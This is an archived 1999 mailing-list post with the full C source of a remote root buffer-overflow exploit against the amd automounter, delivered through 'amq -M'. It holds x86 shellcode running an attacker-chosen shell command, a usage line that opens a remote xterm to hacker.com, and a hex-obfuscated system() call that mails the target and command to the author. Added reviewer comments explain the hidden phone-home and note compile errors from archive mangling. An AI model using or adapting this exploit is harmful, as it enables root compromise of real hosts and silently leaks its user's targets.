
amd remote root exploit code


From: ohhara () OHHARA POSTECH AC KR (Taeho Oh)
Date: Thu, 2 Sep 1999 03:12:55 +0900


 This is amd remote exploit code. This is a well-known bug on the Internet.
 It's a very critical bug; please upgrade am-utils or remove it.

 SCRIPT KIDDIES MUST NOT USE THIS PROGRAM.
 THIS PROGRAM IS DEMONSTRATIVE USE ONLY AND CAN BE DANGEROUS.

begin amd-ex.c
----------------------------------------------------------------------
/*

        Amd Buffer Overflow for x86 linux

        Remote user can gain root access.

        Tested redhat linux : 4.0, 5.1, 6.0
        Tested am-utils version : 6.0

        Requirements
        /usr/sbin/amq

        Usage
        $ amd-ex <hostname> <command> [offset]

        Warning : This program can crash amd.

        This program is for demonstrative use only.
        USE IT AT YOUR OWN RISK!

        Programmed by Taeho Oh 1999/08/31

Taeho Oh ( ohhara () postech edu )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug

*/

#include<stdio.h>
#include<stdlib.h>

/* Default value of the optional argv[3] adjustment that main() subtracts
 * from its hard-coded stack-address guess. */
#define OFFSET                            0
/* buff in main() is RET_POSITION+RANGE+1 (= 1023) bytes long.  The address
 * pattern is written over the whole buffer; the payload is placed RANGE*2
 * bytes before the end and everything in front of it is NOP filler. */
#define RET_POSITION                   1002
#define RANGE                            20
/* x86 `nop` opcode (0x90), used as the filler byte in front of the payload. */
#define NOP                            0x90

/*
 * Payload delivered inside the overlong `amq -M` argument.
 *
 * Per the inline comments it is an x86 Linux stub: it sets up registers and
 * issues syscall 0xb (execve) on the trailing string "/bin/sh -c ", then
 * syscall 1 (exit).  The array is declared 1024 bytes although the literal is
 * only ~59 bytes because main() strcat()s argv[2] (the command, up to 799
 * bytes) onto the end of it, and then rewrites the %esi-relative displacement
 * bytes at indices 5, 13, 21, 32, 35, 42 and 45 so they account for that
 * appended length.  Whatever command is given therefore runs under the
 * privileges of the amd process (root, according to the header comment).
 */
char shellcode[1024]=
        "\xeb\x35"                      /* jmp 0x35             */
        "\x5e"                          /* popl %esi            */
        "\x89\x76\x0b"                  /* movl %esi,0xb(%esi)  */
        "\x89\xf0"                      /* movl %esi,%eax       */
        "\x83\xc0\x08"                  /* addl $0x8,%eax       */
        "\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
        "\x89\xf0"                      /* movl %esi,%eax       */
        "\x83\xc0\x0b"                  /* addl $0xb,%eax       */
        "\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
        "\x31\xc0"                      /* xorl %eax,%eax       */
        "\x88\x46\x07"                  /* movb %eax,0x7(%esi)  */
        "\x88\x46\x0a"                  /* movb %eax,0xa(%esi)  */
        "\x88\x46\x0b"                  /* movb %eax,0xb(%esi)  */
        "\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
        "\xb0\x0b"                      /* movb $0xb,%al        */
        "\x89\xf3"                      /* movl %esi,%ebx       */
        "\x8d\x4e\x0b"                  /* leal 0xb(%esi),%ecx  */
        "\x8d\x56\x0b"                  /* leal 0xb(%esi),%edx  */
        "\xcd\x80"                      /* int 0x80             */
        "\x31\xdb"                      /* xorl %ebx,%ebx       */
        "\x89\xd8"                      /* movl %ebx,%eax       */
        "\x40"                          /* inc %eax             */
        "\xcd\x80"                      /* int 0x80             */
        "\xe8\xc6\xff\xff\xff"          /* call -0x3a           */
        "/bin/sh -c ";                  /* .string "/bin/sh -c "*/

/* argv[2], copied in by main() with an unbounded strcpy() (an argument of
 * 800+ bytes overflows this array).  It is appended to shellcode[] and also
 * spliced, unquoted, into the shell string that main() passes to system(). */
char command[800];

/*
 * Print the crash warning and the usage banner to stdout.
 *
 * The three lines are kept in a table and written with fputs(); none of
 * them contains a % directive, so the output matches the original printf()s.
 */
void usage()
{
        static const char *const banner[] = {
                "Warning : This program can crash amd\n",
                "Usage: amd-ex <hostname> <command> [offset]\n",
                "ex) amd-ex ohhara.target.com \"/usr/X11R6/bin/xterm -display hacker.com:0\"\n",
        };
        size_t k;

        for(k=0;k<sizeof banner/sizeof banner[0];k++)
                fputs(banner[k],stdout);
}

/*
 * Entry point: assembles the overflow string and hands it to
 * /usr/sbin/amq -M against the host named in argv[1].
 *
 * argv[1]  target host (copied to target[256], unbounded)
 * argv[2]  command the payload should run (copied to command[800], unbounded)
 * argv[3]  optional decimal offset subtracted from the hard-coded stack
 *          address guess; defaults to OFFSET
 *
 * Returns: nothing explicit.  On success execl() replaces this process with
 * amq; if execl() fails control falls off the end of main (implicit 0 in
 * C99, indeterminate in C89).
 *
 * Reviewer notes on the code itself:
 *  - <string.h> and <unistd.h> are never included, so strcpy/strcat/strlen/
 *    execl rely on implicit declarations (C89 only).
 *  - cmd[1024] is built with strcat() from target + command + a ~40-byte
 *    suffix; the worst case exceeds 1024 bytes.
 *  - the long* fill loop below writes one byte past the end of buff (UB),
 *    and the char* -> long* cast violates strict aliasing.
 *  - the hex-escaped cmd string is a hidden phone-home: see the note at the
 *    system() call.
 */
int main(int argc,char **argv)
{
        char buff[RET_POSITION+RANGE+1],*ptr;   /* 1023-byte overflow string */
        char target[256];
        char cmd[1024];                         /* shell string for system() */
        long *addr_ptr,addr;
        unsigned long sp;
        int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
        int i;

        /* NOTE(review): these three lines are mangled by the mailing-list
         * archive (the `";);` sequence is HTML-entity residue, and the
         * e-mail address has been rewritten to "ohhara () postech edu").
         * As archived, the file does not compile. */
        printf("Taeho Oh ( ohhara () postech edu )                   http://postech.edu/~ohhara\n";);
        printf("PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus\n";);
        printf("PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug\n\n";);

        if(argc<3)
        {
                usage();
                exit(1);
        }

        /* argc>2 is always true here (argc<3 exited above).  Both copies are
         * unbounded: an overlong argv[1]/argv[2] overflows target[]/command[]. */
        if(argc>2)
        {
                strcpy(target,argv[1]);
                strcpy(command,argv[2]);
        }
        if(argc>3)
                offset=atoi(argv[3]);   /* atoi(): no error reporting for bad input */

        /* Rewrite the %esi-relative displacement bytes of the payload so they
         * account for the length of the command appended right after it. */
        shellcode[5]=(shellcode[5]+strlen(command))/4*4+4;
        shellcode[13]=(shellcode[13]+strlen(command))/4*4+8;
        shellcode[21]=(shellcode[21]+strlen(command))/4*4+12;
        shellcode[32]=(shellcode[32]+strlen(command));
        shellcode[35]=(shellcode[35]+strlen(command))/4*4+16;
        shellcode[42]=(shellcode[42]+strlen(command))/4*4+4;
        shellcode[45]=(shellcode[45]+strlen(command))/4*4+16;
        strcat(shellcode,command);

        /* The hex escapes below decode to:
         *   echo <target> <command>|/bin/mail abuser@ohhara.postech.ac.kr
         * i.e. before amq is even run, the target hostname and the chosen
         * command are mailed to the author's mailbox.  This kind of obfuscated
         * tattle-tale is a recurring feature of circulated exploit code:
         * whoever ran this leaked their target, and the outbound mail is an
         * observable artifact on the sending host.  argv[2] is also spliced
         * in unquoted, so the shell interprets any metacharacters it holds. */
        strcpy(cmd,"\x65\x63\x68\x6f\x20");
        strcat(cmd,target);
        strcat(cmd,"\x20");
        strcat(cmd,command);
        strcat(cmd,"\x7c");
        strcat(cmd,"\x2f\x62\x69\x6e\x2f\x6d\x61\x69\x6c\x20");
        strcat(cmd,"\x61\x62\x75\x73\x65\x72\x40\x6f\x68\x68");
        strcat(cmd,"\x61\x72\x61\x2e\x70\x6f\x73\x74\x65\x63");
        strcat(cmd,"\x68\x2e\x61\x63\x2e\x6b\x72");

        /* Hard-coded stack address guess for the amd process (the header says
         * it was tried on Red Hat 4.0/5.1/6.0); argv[3] shifts it. */
        sp=0xbffff34d;
        addr=sp-offset;

        /* Fill buff with the guessed address, 4 bytes at a time.  i takes the
         * values 0..1020, so the last store covers buff[1020..1023] -- one byte
         * past the 1023-byte array.  Aliasing a char array through long* is
         * undefined as well. */
        ptr=buff;
        addr_ptr=(long*)ptr;
        for(i=0;i<bsize;i+=4)
                *(addr_ptr++)=addr;

        /* NOP filler in front, leaving RANGE*2 + strlen(shellcode) bytes at
         * the end (the int/size_t comparison is done unsigned). */
        for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
                buff[i]=NOP;

        /* Copy the payload (command already appended) just before the
         * trailing block of repeated addresses. */
        ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
        for(i=0;i<strlen(shellcode);i++)
                *(ptr++)=shellcode[i];

        buff[bsize-1]='\0';

        /* Shift the whole buffer right by one byte (buff[0] keeps its old
         * value) and re-terminate.  The source does not say why; presumably
         * an alignment adjustment -- not verifiable from here. */
        for(i=bsize;i>1;i--)
                buff[i-1]=buff[i-2];

        buff[bsize-1]='\0';

        printf("Jump to 0x%08x\n",addr);

        /* Sends the phone-home mail described above; the author's own remark
         * invites removing it. */
        system(cmd); /* If you want, comment out this line. :) */
        /* Delivers buff as the -M argument of amq against the target.  From a
         * defender's standpoint, an amq -M invocation carrying a ~1 KB
         * argument is the on-host artifact to look for; the actual fix is the
         * am-utils upgrade the post recommends. */
        execl("/usr/sbin/amq","amq","-h",target,"-M",buff,NULL);
}
----------------------------------------------------------------------
end amd-ex.c

--

Taeho Oh ( ohhara () postech edu )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug


